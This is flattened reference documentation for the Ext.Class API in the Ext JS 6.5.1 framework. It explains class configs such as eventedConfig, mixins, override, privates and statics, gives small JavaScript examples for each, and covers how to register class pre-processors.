mixins. Config options defined within eventedConfig will auto-generate the setter / getter methods (see config for more information on auto-generated getter / setter methods). Additionally, when an eventedConfig is set it will also fire a before{cfg}change and {cfg}change event when the value of the eventedConfig is changed from its originally defined value. Note: When creating a custom class you'll need to extend Ext.Evented Example custom class: Ext.define('MyApp.util.Test', { extend: 'Ext.Evented', eventedConfig: { foo: null } }); In this example, the foo config will initially be null. Changing it via setFoo will fire the beforefoochange event. The call to the setter can be halted by returning false from a listener on the before event. var test = Ext.create('MyApp.util.Test', { listeners: { beforefoochange: function (instance, newValue, oldValue) { return newValue !== 'bar'; }, foochange: function (instance, newValue, oldValue) { console.log('foo changed to:', newValue); } } }); test.setFoo('bar'); The before event handler can be used to validate changes to foo. Returning false will prevent the setter from changing the value of the config. In the previous example the beforefoochange handler returns false so foo will not be updated and foochange will not be fired. test.setFoo('baz'); Setting foo to 'baz' will not be prevented by the before handler. Foo will be set to the value: 'baz' and the foochange event will be fired. The parent class that this class extends. For example: Ext.define('Person', { say: function(text) { alert(text); } }); Ext.define('Developer', { extend: 'Person', say: function(text) { this.callParent(["print "+text]); } }); List of inheritable static methods for this class. Otherwise just like statics but subclasses inherit these methods. List of classes to mix into this class. For example: Ext.define('CanSing', { sing: function() { alert("For he's a jolly good fellow...") } }); Ext.define('Musician', { mixins: ['CanSing'] }) In this case the Musician class will get a sing method from CanSing mixin. But what if the Musician already has a sing method? Or you want to mix in two classes, both of which define sing? In such a cases it's good to define mixins as an object, where you assign a name to each mixin: Ext.define('Musician', { mixins: { canSing: 'CanSing' }, sing: function() { // delegate singing operation to mixin this.mixins.canSing.sing.call(this); } }) In this case the sing method of Musician will overwrite the mixed in sing method. But you can access the original mixed in method through special mixins property. Overrides members of the specified target class. NOTE: the overridden class must have been defined using Ext.define in order to use the override config. Methods defined on the overriding class will not automatically call the methods of the same name in the ancestor class chain. To call the parent's method of the same name you must call callParent. To skip the method of the overridden class and call its parent you will instead call callSuper. See Ext.define for additional usage examples. The privates config is a list of methods intended to be used internally by the framework. Methods are placed in a privates block to prevent developers from accidentally overriding framework methods in custom classes. Ext.define('Computer', { privates: { runFactory: function(brand) { // internal only processing of brand passed to factory this.factory(brand); } }, factory: function (brand) {} }); In order to override a method from a privates block, the overridden method must also be placed in a privates block within the override class. Ext.define('Override.Computer', { override: 'Computer', privates: { runFactory: function() { // overriding logic } } }); List of classes that have to be loaded before instantiating this class. For example: Ext.define('Mother', { requires: ['Child'], giveBirth: function() { // we can be sure that child class is available. return new Child(); } }); When set to true, the class will be instantiated as singleton. For example: Ext.define('Logger', { singleton: true, log: function(msg) { console.log(msg); } }); Logger.log('Hello'); List of static methods for this class. For example: Ext.define('Computer', { statics: { factory: function(brand) { // 'this' in static methods refer to the class itself return new this(brand); } }, constructor: function() { ... } }); var dellComputer = Computer.factory('Dell'); List of optional classes to load together with this class. These aren't neccessarily loaded before this class is created, but are guaranteed to be available before Ext.onReady listeners are invoked. For example: Ext.define('Mother', { uses: ['Child'], giveBirth: function() { // This code might, or might not work: // return new Child(); // Instead use Ext.create() to load the class at the spot if not loaded already: return Ext.create('Child'); } }); by specifying the alias config option with a prefix of widget. For example: Ext.define('PressMeButton', { extend: 'Ext.button.Button', alias: 'widget. Defaults to: [] Defaults to: {} Create a new anonymous class. Class : Object data : Object An object represent the properties of this class onCreated : Function Optional, the callback function to be executed when this class is fully created. Note that the creation process can be asynchronous depending on the pre-processors used. The newly created class Class : Object data : Object Class : Object data : Object hooks : Object Class : Object data : Object onCreated : Object Retrieve the array stack of default pre-processors defaultPreprocessors Retrieve a pre-processor callback function by its name, which has been registered before name : String preprocessor Register a new pre-processor to be used during the class creation process name : String The pre-processor's name fn : Function The callback function to be executed. Typical format: function(cls, data, fn) { // Your code here // Execute this when the processing is finished. // Asynchronous processing is perfectly ok if (fn) { fn.call(this, cls, data); } }); properties : Object position : Object relativeTo : Object this Insert this pre-processor at a specific position in the stack, optionally relative to any existing pre-processor. For example: Ext.Class.registerPreprocessor('debug', function(cls, data, fn) { // Your code here if (fn) { fn.call(this, cls, data); } }).setDefaultPreprocessorPosition('debug', 'last'); name : String The pre-processor name. Note that it needs to be registered with registerPreprocessor before this offset : String The insertion position. Four possible values are: 'first', 'last', or: 'before', 'after' (relative to the name provided in the third argument) relativeName : String this Set the default array stack of default pre-processors preprocessors : Array this
https://docs.sencha.com/extjs/6.5.1/modern/Ext.Class.html
CC-MAIN-2018-30
refinedweb
1,694
52.05
Caterpillar Inc. (Symbol: CAT). So this week we highlight one interesting put contract, and one interesting call contract, from the January 2018 expiration for CAT. The put contract our YieldBoost algorithm identified as particularly interesting, is at the $80 strike, which has a bid at the time of this writing of $3.70. Collecting that bid as the premium represents a 4.6% return against the $80 commitment, or a 5.5% annualized rate of return (at Stock Options Channel we call this the YieldBoost ). Turning to the other side of the option chain, we highlight one call contract of particular interest for the January 2018 expiration, for shareholders of Caterpillar Inc. (Symbol: CAT) looking to boost their income beyond the stock's 3.2% annualized dividend yield. Selling the covered call at the $105 strike and collecting the premium based on the $3.40 bid, annualizes to an additional 4.3% rate of return against the current stock price (this is what we at Stock Options Channel refer to as the YieldBoost ), for a total of 7.5% annualized rate in the scenario where the stock is not called away. Any upside above $105 would be lost if the stock rises there and is called away, but CAT shares would have to advance 10.8% from current levels for that to happen, meaning that in the scenario where the stock is called, the shareholder has earned a 14.4% return from this trading level, in addition to any dividends collected before the stock was called. Top YieldBoost CAT.
http://www.nasdaq.com/article/interesting-january-2018-stock-options-for-cat-cm763031
CC-MAIN-2017-13
refinedweb
259
64.1
We just released an update of Pex that brings a very cool new feature, Unit Tests as Inputs and updates for Visual Studio 2010 Beta 1, Code Contracts and F# Beta 1. As usual, this release also contains a number of bug fixes and small feature improvements, most of which address your suggestions from the Pex forum. Seeding the Exploration Part 1: Unit Tests as Inputs Before using heavy-weight constraint solving to explore hard-to-reach execution paths, Pex can now leverage already existing unit tests that call a parameterized unit tests: Pex scans their body to extract the parameter values, and then Pex uses these values to seed the exploration. (In the past, Pex would have seeded the exploration by simply using the default values for all parameters, and nothing else.) Here is an example, where Pex starts the exploration of the parameterized unit test Multiply by reusing the values mentioned in the unit test MultiplySeed, as you can see in the first row of the table of generated tests. As a (intended) side effect, Pex also reuses the tests that Pex might have generated during earlier explorations. In effect, Pex never has to start from scratch again, but instead can reuse knowledge from earlier explorations. There is a big limitation in this first version of the new feature: Pex can only use values of primitive types, and arrays of primitive types as seeds, and the values must be passed as parameters, not via PexChoose. The unit tests must be in the same class as the parameterized unit test, marked as a unit test, and have a simple structure, i.e., they must just create the input data, and the first method call must be to a parameterized unit test. Seeding the Exploration Part 2: [PexArgument(…)] to Fuzz Inputs and Help Pex Pex can not only extract values from existing unit tests, but there is in fact a general API through which seed values can be given. In particular, you can use the new PexArgumentAttribute (and a bunch of related new attributes) to provide seed values. Here is an example: During the subsequent exploration, Pex will often reuse parts of the seeded values, which may make constraint solving easier for Pex. Also, when Pex cannot solve all constraints to leap beyond a difficult branch, then you can use this feature to help Pex by providing the values yourself. Object Creation with Invariants Code Contracts enable the specification of class invariants by writing an “invariant method” decorated with the ContractInvariantMethod attribute. For example, for a typical ArrayList implementation, this invariant method might read as follows: public class ArrayList { private Object[] _items; private int _size; ... [ContractInvariantMethod] // attribute comes with Code Contracts, not Pex protected void Invariant() { Contract.Invariant(this._items != null); Contract.Invariant(this._size >= 0); Contract.Invariant(this._items.Length >= this._size); } If you have such an invariant, and if you correctly configure runtime checking of contracts, then Pex will create instances of this type by first creating a raw instance, setting all private fields directly, and then making sure that the invariant holds. A generated test case for the Add method of the ArrayList class might then read as follows: [TestMethod] public void Add01() { object[] os = new object[0]; ArrayList arrayList = PexInvariant.CreateInstance<ArrayList>(); // creates raw instance PexInvariant.SetField<object[]>(arrayList, "_items", os); // sets private field via reflection PexInvariant.SetField<int>(arrayList, "_size", 0); // same PexInvariant.CheckInvariant(arrayList); // invokes invariant method via reflection arrayList.Add(null); // call to method-under-test } A limitation of the current implementation is that the type itself must be public, and the types of all fields must be public (but not the fields themselves.) Surviving unhandled exceptions in Finalizers Finalizers are especially problematic for test runners: there is no guarantee from the runtime when they will be executed, and when they throw an exception, the process terminates. This is not an uncommon scenario when you apply Pex to (buggy) code with Finalizers: It seems as if Pex suddenly crashes. In this version, we have improved the robustness of Pex with respect to those failures. Pex effectively rewrites all finalizers of instrumented types with a catch handler that swallows all exceptions and sends it to Pex’ logging infrastructure. Visual Studio 2010 Beta 1 support We’ve updated Pex for Visual Studio 2010 Beta 1, the latest Code Contracts version and F# Beta 1. Send Feedback at your fingertips We made it even easier for you to ask questions about Pex, or to just tell us what you think, right from Visual Studio: Bug fixes and other small features We Breaking Changes Peli just announced that we have released Pex version 0.10. (You didn’t think that after version 0.9 we would go straight to version 1.0, did you?) There are many exciting improvements, including better support for other test frameworks, VB.NET, F#, assertion generation, Code Contracts, and Stubs. Many of the changes are thanks to your feedback on our MSDN Pex Forum. Also, together with Tao Xie, we are going to give a Tutorial on Parameterized Unit Testing at the International Conference of Software Engineering (ICSE) conference next month on May 17th in Vancouver, Canada. Go and register as long as slots are available. This is a great introduction if you are interested in using Pex or other test input generation tools to test your code, but you were struggling with the new concepts such as Parameterized Unit Tests. Soma. We just released the most exciting iteration of Pex to this date: version 0.8. Update: Pex is now a DevLabs project, and available as a Microsoft Download for Visual Studio 2010 CTP. (It won't install without it.) The Microsoft Research download still comes with the Microsoft Research license, so you cannot use it for commercial purposes, but it's perfect if you just want to try it out, or use it for academic purposes; it targets Visual Studio 2008 Professional, but all you really need is Windows XP with .NET 2.0. Besides lots of bug fixes and little improvements, this release comes with two huge innovations: Code Digger, and Stubs. New Experience: Code Digger..." You can have that test suite! (And you won't have to sweat for it.) We have added an entirely new way of using Pex: Just right-click somewhere in the code you are currently editing, and then Pex will analyze all the branches in the code. Pex shows you a table of interesting input/output values, and you can save all findings as a unit test suite with a single button click. There you are. Enjoy your small test suite with high code coverage that integrates with VIsual Studio Team Test! We call this new experience Code Digger. If the short description above didn't quite make sense to you, read my longer post on Code Digger, and check out the full Code Digger tutorial (it already refers to the forthcoming VS2010, but don't let that stop you). New Feature: Stubs Also shipping in this release: Stubs - A Simple Framework For .NET Test Stubs; also comes with a manual. It's a no-nonsense framework to easily create and maintain lightweight implementations of interfaces and abstract classes. Stay tuned for more: PDC is coming There will be further announcements. And don't forget: Pex is at PDC! Go to our talk at PDC and get the latest demo at the Microsoft Research booth! Do you control your code?. We. We. We? 2: public unsafe void TestX86(long x) 4: void* p = (void*)x; 5: if (p == null && x == (1L<<32)) 6: throw new Exception("bug!");. After we released Pex recently, I came across a couple of interesting blog posts of people who tried out Pex, for example Ben Hall, Peter, and Stan. They all ran Pex on a small example. In this post, I want to run Pex on a more complicated piece of code: The .Net ResourceReader, and all the other classes which it uses under the hood. The ResourceReader takes a stream of data, and splits it up into individual chunks that represent resources. In that sense, the ResourceReader is a big parser. I started by creating a new C# test project in Microsoft Visual Studio, and adding a reference to Microsoft.Pex.Framework. (If you try this at home, you need to install Pex first, of course.) Then I wrote a very simple parameterized unit test for the resource reader. It takes any (non-null) array of bytes, creates an UnmanagedMemoryStream with the bytes, and then decodes it with the ResourceReader. It's not a particular expressive test, since it doesn't contain any assertions. All this test is really saying is that, no matter what the test inputs are, the code shouldn't throw any exception. (No exception at all? I'll investigate this in more detail later.) 1: [PexClass, TestClass] 2: public partial class ResourceReaderTest 3: { 4: [PexMethod] 5: public unsafe void ReadEntries([PexAssumeNotNull]byte[] data) 6: { 7: fixed (byte* p = data) 8: using (UnmanagedMemoryStream stream = 9: new UnmanagedMemoryStream(p, data.Length)) 10: { 11: ResourceReader reader = new ResourceReader(stream); 12: foreach (var entry in reader) { /* just reading */ } 13: } 14: } 15: } Let's run Pex. I can now let Pex analyze this parameterized unit test in-depth by right-clicking on the parameterized unit test, and selecting Run Pex Exploration. (I am running our latest internal Pex bits, and we just renamed the "Pex It" menu item to "Run Pex Exploration". So if you just see a "Pex It" menu item, use that.) Pex now generates test inputs. In a nutshell, Pex runs the code, monitors what it's doing, and uses a constraint solver to determine more relevant test inputs that will take the program along different execution paths. That sounds great, but the result is a little bit disappointing: Pex reports only two test inputs: An empty array, and an array with one element that is zero. (Again, I have to say that I am running our latest internal Pex bits. If you see a big black empty region in the lower right part of the Pex Results, titled with "dynamic coverage", then you can get rid of this waste of screen real-estate by pressing the button that I circled in red: We won't show this "dynamic coverage" graph by default anymore. I might talk more about this feature in the future. And now, back to the ResourceReader.) Pex tells us in bold letters on red ground that it encountered 3 Uninstrumented Methods. What does that mean? Well, Pex performs a dynamic analysis, which means that it runs the code, and then Pex monitors what the code is actually doing. However, Pex doesn't monitor all code, but only code that Pex instruments. Pex doesn't instrument all code by default, since the instrumentation and the monitoring comes with a huge performance overhead. And often it is not necessary to monitor all the code that is running. For example, when you want to test your algorithm, and your algorithm happens to write its progress to the console, then you still only want to test your algorithm, but not all the supporting code that hides behind Console.WriteLine. But back to the ResourceReader: Let's click on the 3 Uninstrumented Methods warning. We see that Pex neither instrumented UnmanagedMemoryStream nor ResourceReader. No wonder that Pex' analysis didn't find any really interesting test inputs! Pex also didn't monitor what happened in a call to GC.SuppressFinalize, but this relates to the .NET garbage collector, and probably isn't so important. (In fact, Pex has a built-in list of classes which don't need to be monitored, and we might add the GC class to this list in the future.) Let's select UnmanagedMemoryStream..ctor (".ctor" is the generic .NET name for constructors), and click on Instrument type, and repeat for ResourceReader..ctor. For GC.SuppressFinalize, I click on Ignore uninstrumented method instead. Pex persists my choices as assembly-level attributes in a new file called PexAssembyInfo.cs in the Properties folder. It now looks like this: 1: using Microsoft.Pex.Framework.Instrumentation; 2: using System.IO; 3: using System.Resources; 4: using Microsoft.Pex.Framework.Suppression; 5: using System; 6: 7: [assembly: PexInstrumentType(typeof(UnmanagedMemoryStream))] 8: [assembly: PexInstrumentType(typeof(ResourceReader))] 9: [assembly: PexSuppressUninstrumentedMethodFromType(typeof(GC))] Pex did a little bit more this time -- three test cases! And another 7 Uninstrumented Methods warnings... What are the uninstrumented methods this time? As you can see, Pex' analysis already proceeded much deeper into the code, and now Pex hits all kinds of other methods. Most of the methods sound relevant. So I repeat the game, and let Pex instrument all of the types. And then I let Pex run again. Boom! Pex still reports some uninstrumented methods (and lots of other things which I'll explain another time), but Pex also doesn't stop so quickly anymore. Instead, Pex is having a ball and it keeps producing more and more test cases: (If you run this example yourself, the precise results you get will vary. There is some non-deterministic code involved in the analysis.) Pex even managed to produce a valid resource file! (here, row 215 with the green checkmark) When you double-click on any row, Pex shows the generated unit test code. Here is the valid resource file: 1: [TestMethod] 2: [PexGeneratedBy(typeof(ResourceReaderTest))] 3: public void ReadEntriesByte_20080604_134738_032() 4: { 5: byte[] bs0 = new byte[55]; 6: bs0[0] = (byte)206; 7: bs0[1] = (byte)202; 8: bs0[2] = (byte)239; 9: bs0[3] = (byte)190; 10: bs0[7] = (byte)64; 11: bs0[12] = (byte)2; 12: bs0[20] = (byte)7; 13: bs0[24] = (byte)128; 14: bs0[25] = (byte)128; 15: bs0[32] = (byte)4; 16: this.ReadEntries(bs0); 17: } The resource file is 55 bytes long, and most bytes are zero, the default value of the byte type. All values which are not zero were carefully chosen by Pex to pass all the file-validation code of the ResourceReader. Configuring the test oracle: Allowed exceptions All the other rows are tagged with an ugly red cross, indicating that the test failed. Did these tests really fail? Let's see. In all cases, the code either throws a ArgumentNullException, ArgumentException, BadImageFormatException, IOException, NotSupportedException, or a FormatException. These exceptions don't sound so unreasonable, considering that Pex tried obviously ill-formed test inputs in the course of its exploration. If you look around the documentation of the ResourceReader (here, here, and here), you will find that in fact most of these exceptions are documented somewhere (although the documentation could be more explicit, and it's missing NotSupportedException). I can inform Pex that these exceptions are okay. The easiest way to do that is to select a failing test case in the table, and then click on Allow It. Again, my choice is persisted as attributes in PexAssemblyInfo.cs: 1: [assembly: PexAllowedExceptionFromAssembly(typeof(ArgumentNullException), "mscorlib")] 2: [assembly: PexAllowedExceptionFromAssembly(typeof(BadImageFormatException), "mscorlib")] 3: [assembly: PexAllowedExceptionFromAssembly(typeof(ArgumentException), "mscorlib")] 4: [assembly: PexAllowedExceptionFromAssembly(typeof(NotSupportedException), "mscorlib")] 5: [assembly: PexAllowedExceptionFromAssembly(typeof(IOException), "mscorlib")] 6: [assembly: PexAllowedExceptionFromAssembly(typeof(FormatException), "mscorlib")] When you run Pex again, all the exceptions that are marked as allowed are now tagged with friendly green checkmarks, indicating that they passed. But what is that? An OverflowException... (here, the red cross in row 98) Yet another undocumented exception... You have seen how to configure code instrumentation settings, and how to tell Pex that certain exceptions are okay. But I think there is a much more interesting insight: By using Pex, we discovered some unexpected ways how some complicated library code behaves. Library code that we build our applications on. Documentation will always be imperfect, and we have to test our applications to make sure that we everything works correctly together. By using a white-box testing tool like Pex, that tried many relevant test inputs and not just one exemplary test input, we discovered behaviors (here, exceptions) we were not aware of before! That's it for today. Another time I might talk about the constraints that Pex had to solve to create a valid resource file, how to get an idea about how much code analyzed, how to visualize that Pex makes progress, and how to write more expressive parameterized unit tests. This posting is provided "AS IS" with no warranties, and confers no rights. Today. Trademarks | Privacy Statement
http://blogs.msdn.com/nikolait/default.aspx
crawl-002
refinedweb
2,744
53.51
How to get a specific value of data after submitting on first task Hi, Just want to ask how to get a specific value of data after submitting on first task. After I click submit button and then the approver will click approve a sequential number depending on the company of the creator will be generated. I want to get the max number with the company if company is the same and have an existing number then +1 but if newly created processes without number then start with 1. But I cannot get the max number and the company of the processes as well. The task failed after I submit after approval. I do the generation on operations and set the number using groovy. See below code and custom query: Groovy code int numSeq = 0 if(pettyCashHeaderDAO.findByMaxPetCashNo().toString() == "") { numSeq = 1 } else { numSeq++ } def petCashNum = numSeq.toString().padLeft(6, '0') return petCashNum Custom Query SELECT MAX(p.petCashNo) FROM PettyCashHeader p WHERE p.isApproved = true ORDER BY p.preparedDate ASC Please help. Thank you guys. Hi christianmichaelgarizala, Unfortunely, the DAO obejct related to your object is not accessible from Groovy scripts, there is a knowm limitation that blocks us to use it. So you will never get your custom query executed and will always get a error ! I suggest you to do a connector before the task to get the desire information and in your groovy code for operation use it to increment and set to your object attribute. Cheers, Marcos Vinícius Pinto Hi In my Process , I use the Custom query to retrieve the Max Req Id and then Increment it by 1 each time. Here is the custom query SELECT coalesce(Max(requestId), 0) FROM RPrenewalProcess note that the return type is count and all parameters are removed. Now in my Task => operations i use the Below script to increment the value. (rPrenewalProcessDAO.MaxRequestId() + 1).toString(); note that in my case the variable to hold req id is of type text . If you have long variable , then no need to use toString(); Hope this helps
https://community.bonitasoft.com/questions-and-answers/how-get-specific-value-data-after-submitting-first-task
CC-MAIN-2021-17
refinedweb
347
63.8
NAMEgrantpt - grant access to the slave pseudoterminal SYNOPSIS #include <stdlib.h> int grantpt(int fd); Feature Test Macro Requirements for glibc (see feature_test_macros(7)): grantpt(): Since glibc 2.24: _XOPEN_SOURCE >= 500 Glibc 2.23 and earlier: _XOPEN_SOURCE DESCRIPTIONThe VALUEWhen successful, grantpt() returns 0. Otherwise, it returns -1 and sets errno to indicate the error. ERRORS - EACCES - The corresponding slave pseudoterminal could not be accessed. - EBADF - The fd argument is not a valid open file descriptor. - EINVAL - The fd argument is valid but not associated with a master pseudoterminal. VERSIONSgrantpt() is provided in glibc since version 2.1. ATTRIBUTESFor an explanation of the terms used in this section, see attributes(7). CONFORMING TOPOSIX.1-2001, POSIX.1-2008. NOTESThis).
https://man.archlinux.org/man/grantpt.3.en
CC-MAIN-2021-25
refinedweb
118
52.15
Used to prevent name collisions when using multiple libraries, a namespace is a declarative prefix for functions, classes, types, etc. The keyword namespace has three different meanings depending on context: When followed by an optional name and a brace-enclosed sequence of declarations, it defines a new namespace or extends an existing namespace with those declarations. If the name is omitted, the namespace is an unnamed namespace. When followed by a name and an equal sign, it declares a namespace alias. When preceded by using and followed by a namespace name, it forms a using directive, which allows names in the given namespace to be found by unqualified name lookup (but does not redeclare those names in the current scope). A using-directive cannot occur at class scope. using namespace std; is discouraged. Why? Because namespace std is huge! This means that there is a high chance that names will collide: //Really bad! using namespace std; //Calculates p^e and outputs it to std::cout void pow(double p, double e) { /*...*/ } //Calls pow pow(5.0, 2.0); //Error! There is already a pow function in namespace std with the same signature, //so the call is ambiguous
https://riptutorial.com/cplusplus/topic/495/namespaces
CC-MAIN-2019-04
refinedweb
197
63.9
Short Complexity: time complexity is O(N) space complexity is O(N) Execution: The time complexity of this solution is a question as is always true with hash maps. It is either O(N), O(NlogN) or O(N^2) depending on your particular implementation and hash algorithm. After I solved this, I looked at the editorial and was amazed by the complex algorithm that they proposed. This is much simpler. Yet I agree that the editorial is more time/space effective. Iterate over the list of all values [1,N]. Use the lowest available value from the [1,N] pool. Either i-K or i+k, if i-K is not available. Solution: import math import os import random import re import sys # Complete the absolutePermutation function below. def absolutePermutation(n, k): solution = [] s = set(range(1,n+1)) for pos in xrange(1, n+1): if pos-k in s: solution.append(pos-k) s.remove(pos-k) elif pos+k in s: solution.append(pos+k) s.remove(pos+k) else: return [-1] return solution if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') t = int(raw_input()) for t_itr in xrange(t): nk = raw_input().split() n = int(nk[0]) k = int(nk[1]) result = absolutePermutation(n, k) fptr.write(' '.join(map(str, result))) fptr.write('n') fptr.close()
https://nerdprogrammer.com/hackerrank-absolute-permutation-solution/
CC-MAIN-2020-40
refinedweb
221
51.44
Nmap Development mailing list archives -----Original Message----- From: ambarisha b [mailto:b.ambarisha () gmail com] Sent: Sunday, February 06, 2011 2:40 PM To: Thomas Buchanan; nmap-dev () insecure org Subject: Re: Version display patch David, thanks for the revised patch.I have attached the patch after making the changes that you pointed out. Thomas, thanks for pointing that out.Can you post the error you got on including dnet_winconfig.h ? Regards Ambarisha I tried the updated patch you attached, but with the following line: #include "libdnet-stripped/include/config.h" Changed to: #include "libdnet-stripped/include/dnet_winconfig.h" This time I didn't get a compile error with dnet_winconfig.h, but did get the following linking error: 4>nmap.obj : error LNK2001: unresolved external symbol "char const * const pcap_version" (?pcap_version@@3QBDB) 4>.\Release/nmap.exe : fatal error LNK1120: 1 unresolved externals Any ideas? Thanks, Thomas _______________________________________________ Sent through the nmap-dev mailing list Archived at By Date By Thread
http://seclists.org/nmap-dev/2011/q1/450
CC-MAIN-2014-15
refinedweb
160
60.01
Ok, My assignment is to create 2 functions, then call those functions from a menu. I have the menu part, and I think my functions are numerically correct but I get this error warning C4700: uninitialized local variable 'ci' used warning C4700: uninitialized local variable 'cc' used Here is the program: I can't figure out what it means --- when I run the program the menu come up right, but it will not run the funtion. :/I can't figure out what it means --- when I run the program the menu come up right, but it will not run the funtion. :/Code:#include <iostream> #include <cmath> using namespace std; void ci2cc(double& cubinch) { double cc, ci; cc = ci*16.387064; } // cubic inch to cubic centimenter void cc2ci(double& cubcent) { double cc,ci; ci = cc/16.387064; } // cubic centimeter to cubic inch void main() { double cubinch, cubcent; int select; do { cout << " 0 : Exit the program. \n"<< " 2 : Convert Cubic inch to cc. \n" << " 3 : Convert cc to Cubic inch. \n";cout << "Please enter the selection : "; cin >> select; switch(select) { case 0 : cout << "Program teminates. \n"; break; case 1 : cout << "Please enter a value in cubic inches : "; cin >> cubinch; ci2cc(cubinch); cout << "" << cubinch << " cubic inch = " << cubcent << " cubic centimeter " << endl; break; case 2 : cout << "Please enter a value in cubic centimeters : "; cin >> cubcent; cc2ci(cubcent); cout << "" << cubcent << " cc = " << cubinch << " Cubic inches " << endl; break; default : cout << "Invalid selection.\n"; } // switch }while(select != 3); } // main Thanks in advance! Jessica
http://cboard.cprogramming.com/cplusplus-programming/125084-help-functions.html
CC-MAIN-2015-40
refinedweb
244
60.65
A command line parsing module that lets modules define their own options. Each module defines its own options which are added to the global option namespace,. However, all modules that define options must have been imported before the command line is parsed. Your main() method can parse the command line or parse a config file with either: tornado.options.parse_command_line() # or tornado.options.parse_config_file("/etc/server.conf") Command line formats are what you would expect (--myoption=myvalue). Config files are just Python files. Global names become options, e.g.: myoption = "myvalue" myotheroption = "myothervalue" We support datetimes, timedeltas, ints, and floats (just pass a type kwarg to define). We also accept multi-value options. See the documentation for define() below. tornado.options.options is a singleton instance of OptionParser, and the top-level functions in this module (define, parse_command_line, etc) simply call methods on it. You may create additional OptionParser instances to define isolated sets of options, such as for subcommands. Defines an option in the global namespace. See OptionParser.define. Global options object. All defined options are available as attributes on this object. Parses global options from the command line. See OptionParser.parse_command_line. Parses global options from a config file. See OptionParser.parse_config_file. Prints all the command line options to stderr (or another file). See OptionParser.print_help. Adds a parse callback, to be invoked when option parsing is done. See OptionParser.add_parse_callback Exception raised by errors in the options module. A collection of options, a dictionary with object-like access. Normally accessed via static functions in the tornado.options module, which reference a global instance. Adds a parse callback, to be invoked when option parsing is done. file in which they are defined. Command line option names must be unique globally. They can be parsed from the command line with parse_command_line or parsed from a config file with parse_config_file. If a callback is given, it will be run with the new value whenever the option is changed. This can be used to combine command-line and file-based options: define("config", type=str, help="path to config file", callback=lambda path: parse_config_file(path, final=False)) With this definition, options in the file specified by --config will override options set earlier on the command line, but can be overridden by later flags. Returns a wrapper around self that is compatible with mock.patch. The mock.patch function (included in the standard library unittest.mock package since Python 3.3, or in the third-party mock package for older versions of Python) is incompatible with objects like options that override __getattr__ and __setattr__. This function returns an object that can be used with mock.patch.object to modify option values: with mock.patch.object(options.mockable(), 'name', value): assert options.name == value Parses all options given on the command line (defaults to sys.argv). Note that args[0] is ignored since it is the program name in sys.argv. We return a list of all arguments that are not parsed as options. If final is False, parse callbacks will not be run. This is useful for applications that wish to combine configurations from multiple sources. Parses and loads the Python config file at the given path. If final is False, parse callbacks will not be run. This is useful for applications that wish to combine configurations from multiple sources. Prints all the command line options to stderr (or another file).
http://www.tornadoweb.org/en/branch3.0/options.html
CC-MAIN-2013-48
refinedweb
568
59.9
Microsoft enters the ORM (Object Relational Mapping) world with the introduction of LINQ (Language Integrated Query). This is provided as a built-in feature in Visual Studio 2008 and the .NET Framework 3.5 which was released to the public on November 19, 2007. Like most ORM data models, LINQ offers the ability to work with databases and other form of data stores (such as XML) as pure objects. For example, if your data store is a SQL Server relational database then LINQ will convert your tables into objects called Entities and treat the table fields as Properties. LINQ also provides full support for your stored procedures by using them as Methods (providing functionalities for your objects). So why would anybody want to use LINQ? Well, in most cases today, if you want to provide data to your objects, you would do the following steps: Assumed you have an ADO.NET wrapper called ADOSqlHelper, your code might look similar to this: string conStr = ""; DataSet ds = ADOSqlHelper.GetDataSource(conStr,"SELECT * FROM Customers") GridView1.DataSoure = ds.Tables[0]; GridView1.DataBind(); Not that there is anything wrong with doing it that way, but using LINQ offers an alternative. Once you have defined a LINQ object model using the designer palette in Visual Studio 2008, populating the GridView control with data is reduced to a couple of statements using new C# syntax: GridView1.DataSource = from cust in Customers select cust; GridView1.DataBind(); In addition to that, LINQ takes care of the behind the scene plumbing for you. It even took care of writing code for Inserting, Updating, and Deleting the data. In this article you will learn how to use LINQ through a step by step example of creating a basic website that accesses data using LINQ. I have provided the sample demonstration web application as a zip file. Please read the Application Requirements section below for instructions on how to install and use it. I am by no means a LINQ expert and there is so much to learn about LINQ. This article serves only as an introduction. For more information please visit. The Northwind LINQ Web Application is a demo ASP.NET web application written in Visual Studio 2008 (C#) on top of the .NET Framework 3.5. It consists of two major functionalities as displayed in the main screen below: When you select the link View and Manage Northwind Customers you are presented with a page that displays the list of customers from the Northwind Microsoft SQL Server sample database. From that page you have functionalities to Add, Edit, and Delete customers. See screen shot below. When you select the link View Northwind Suppliers and their Products from the main screen you are presented with a page that displays the list of suppliers and their products. The goal is to implement these functionalities for the demo application using LING as an ORM. To do this a Visual Studio 2008 solution with two projects will be created. The first project is a class library to hold our data model. The second project is an ASP.NET web application that contains the pages that will consume the object data model created in the class library project. To start developing the LINQ data model we create a new project that is a class library project type. See screen shot below. Next we add a new LINQ to SQL item called Northwind to the project. It has an extension of DBML (short for database model). This file will serve as the container for the newly created Northwind object database model. It actually contains two panes: one for holding the Entities (tables) with their Properties (table fields), and the other to hold the Methods (optional stored procedures). See screen shot below. LINQ needs to know which server and database to use. To do this a database connection is required. To connect to a database, In the Visual Studio 2008 designer, click on the Tools menu and select the Connect to Database… item. It will then prompt to choose a data source as displayed in the screen shot below. Then it will give the opportunity to select the SQL Server instance and database to model against. See below. If successfully connected to a database then the Visual Studio designer palette now includes the Server Explorer column with the selected database and its tables and stored procedures as displayed in the screen shot below. Now it is just a matter of opening the Tables and Stored procedures folders and dragging and dropping the tables (data classes) and stored procedures (methods) to be included with the model. For this project the tables Customer, Order, Order_Detail, Supplier, and Product are dropped in the data classes pane. Also the stored procedure CustOrderHist is dropped in the methods pane. The Visual Studio window looks like the following screen. As the screen shows the model is presented nicely as an object relational model. The classes and their properties are displayed as boxes. Also, notice the one-to-many relationships existence between the classes as indicated by the arrows. Don’t forget the stored procedure also shown on the right side. That’s it! The model is done and we didn’t even write one line of code. Everything required to provide functionality for our web application is done (including Adding, Selecting, Updating, and deleting data). Actually, there’s a lot that took place behind the scene. But this is beyond this article. Please visit MSDN. For now let’s continue by implementing the ASP.NET web application. It’s time to start coding. Now that we have a data model that the web application can use to consume data we can start looking at the application’s functionalities. The web application must provide the following functions: Add a new ASP.NET Web Application project to the Visual Studio 2008 solution. Add a Reference to the data model project you created above. See screen shot below. To save time please download and install the sample demo application zip file in order to view the ASPX and C# code files as I will now refer to them to continue the demonstration. See requirement and installation instructions in the Introduction section above. The CustomerListing.aspx file contains a GridView control in which is used to bind to the Customers object we created in the data model. The code-behind located in the CustomerListing.aspx.cs file contains the following code snippet: NorthwindDataContext db = new NorthwindDataContext(); var customers = from c in db.Customers select c; grdCust.DataSource = customers; grdCust.DataBind(); After referencing the 